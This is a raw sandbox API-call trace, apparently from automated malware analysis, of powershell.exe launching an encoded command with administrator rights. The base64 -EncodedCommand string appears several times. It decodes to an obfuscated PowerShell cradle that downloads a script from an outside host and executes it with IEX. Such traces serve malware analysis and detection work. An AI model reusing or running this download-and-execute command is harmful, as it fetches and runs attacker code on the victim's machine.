	[0328.269] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.270] SetErrorMode (uMode=0x1) returned 0x1
	[0328.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.270] SetErrorMode (uMode=0x1) returned 0x1
	[0328.270] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.270] SetErrorMode (uMode=0x1) returned 0x1
	[0328.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.271] SetErrorMode (uMode=0x1) returned 0x1
	[0328.271] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.271] SetErrorMode (uMode=0x1) returned 0x1
	[0328.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.271] SetErrorMode (uMode=0x1) returned 0x1
	[0328.271] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.272] SetErrorMode (uMode=0x1) returned 0x1
	[0328.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.272] SetErrorMode (uMode=0x1) returned 0x1
	[0328.272] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.272] SetErrorMode (uMode=0x1) returned 0x1
	[0328.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.273] SetErrorMode (uMode=0x1) returned 0x1
	[0328.273] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.273] SetErrorMode (uMode=0x1) returned 0x1
	[0328.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.273] SetErrorMode (uMode=0x1) returned 0x1
	[0328.273] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.274] SetErrorMode (uMode=0x1) returned 0x1
	[0328.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.274] SetErrorMode (uMode=0x1) returned 0x1
	[0328.274] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.274] SetErrorMode (uMode=0x1) returned 0x1
	[0328.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.275] SetErrorMode (uMode=0x1) returned 0x1
	[0328.275] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.275] SetErrorMode (uMode=0x1) returned 0x1
	[0328.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.275] SetErrorMode (uMode=0x1) returned 0x1
	[0328.275] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.276] SetErrorMode (uMode=0x1) returned 0x1
	[0328.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.276] SetErrorMode (uMode=0x1) returned 0x1
	[0328.276] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.276] SetErrorMode (uMode=0x1) returned 0x1
	[0328.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0328.277] SetErrorMode (uMode=0x1) returned 0x1
	[0328.277] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.277] SetErrorMode (uMode=0x1) returned 0x1
	[0328.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0328.277] SetErrorMode (uMode=0x1) returned 0x1
	[0328.278] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.278] SetErrorMode (uMode=0x1) returned 0x1
	[0328.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0328.278] SetErrorMode (uMode=0x1) returned 0x1
	[0328.278] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.278] SetErrorMode (uMode=0x1) returned 0x1
	[0328.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0328.279] SetErrorMode (uMode=0x1) returned 0x1
	[0328.279] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.279] SetErrorMode (uMode=0x1) returned 0x1
	[0328.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0328.279] SetErrorMode (uMode=0x1) returned 0x1
	[0328.280] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x4d16c0
	[0328.281] FindNextFileW (in: hFindFile=0x4d16c0, lpFindFileData=0x1c7ddd50 | out: lpFindFileData=0x1c7ddd50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0328.281] FindClose (in: hFindFile=0x4d16c0 | out: hFindFile=0x4d16c0) returned 1
	[0328.281] SetErrorMode (uMode=0x1) returned 0x1
	[0328.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c7dde60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0328.282] SetErrorMode (uMode=0x1) returned 0x1
	[0328.282] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c7de070 | out: lpFileInformation=0x1c7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0328.282] SetErrorMode (uMode=0x1) returned 0x1
	[0328.761] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0328.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.761] CoTaskMemFree (pv=0x471f80) 
	[0329.295] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0329.295] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.295] CoTaskMemFree (pv=0x471f80) 
	[0329.299] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0329.299] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.299] CoTaskMemFree (pv=0x471f80) 
	[0329.886] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0329.886] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.886] CoTaskMemFree (pv=0x471f80) 
	[0329.899] CoTaskMemAlloc (cb=0x3b) returned 0x52a500
	[0330.621] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7de258, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7de258) returned 0x4550
	[0330.623] CoTaskMemFree (pv=0x52a500) 
	[0330.625] GetConsoleWindow () returned 0x201ec
	[0330.632] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0330.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0330.632] CoTaskMemFree (pv=0x471f80) 
	[0330.633] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0330.633] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.633] CoTaskMemFree (pv=0x471f80) 
	[0330.638] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0330.638] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.638] CoTaskMemFree (pv=0x471f80) 
	[0330.640] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c7de2a0 | out: pNumArgs=0x1c7de2a0) returned 0x1b7220e0*=""
	[0330.641] lstrlenW (lpString="-EncodedCommand") returned 15
	[0330.642] CoTaskMemAlloc (cb=0x22) returned 0x1b739d60
	[0330.642] RtlMoveMemory (in: Destination=0x1b739d60, Source=0x1b722102, Length=0x20 | out: Destination=0x1b739d60) 
	[0330.642] CoTaskMemFree (pv=0x1b739d60) 
	[0330.642] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0330.642] CoTaskMemAlloc (cb=0x2f4) returned 0x4317b0
	[0330.642] RtlMoveMemory (in: Destination=0x4317b0, Source=0x1b722122, Length=0x2f2 | out: Destination=0x4317b0) 
	[0330.642] CoTaskMemFree (pv=0x4317b0) 
	[0330.643] LocalFree (hMem=0x1b7220e0) returned 0x0
	[0330.645] CoTaskMemAlloc (cb=0x804) returned 0x1b733100
	[0330.645] GetConsoleTitleW (in: lpConsoleTitle=0x1b733100, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0330.645] CoTaskMemFree (pv=0x1b733100) 
	[0331.224] CoTaskMemAlloc (cb=0x38e) returned 0x1b7220e0
	[0331.225] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c7de200*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2e392d8 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2e392d8*(hProcess=0x364, hThread=0x3a0, dwProcessId=0xf38, dwThreadId=0xf3c)) returned 1
	[0331.505] CoTaskMemFree (pv=0x1b7220e0) 
	[0331.506] CloseHandle (hObject=0x3a0) returned 1
	[0331.506] CoTaskMemAlloc (cb=0x3b) returned 0x52a500
	[0331.506] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7de2a8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7de2a8) returned 0x4550
	[0331.507] CoTaskMemFree (pv=0x52a500) 
	[0332.362] GetCurrentProcess () returned 0xffffffffffffffff
	[0332.362] GetCurrentProcess () returned 0xffffffffffffffff
	[0332.363] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x364, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7de388, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7de388*=0x3a0) returned 1

Process:
	id = "10"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3110a000"
	os_pid = "0x4b4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 56
	os_tid = 0x768

	[0247.552] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0248.165] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0248.165] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0248.165] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0248.165] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0249.934] GetVersionExW (in: lpVersionInformation=0x12dde0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dde0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
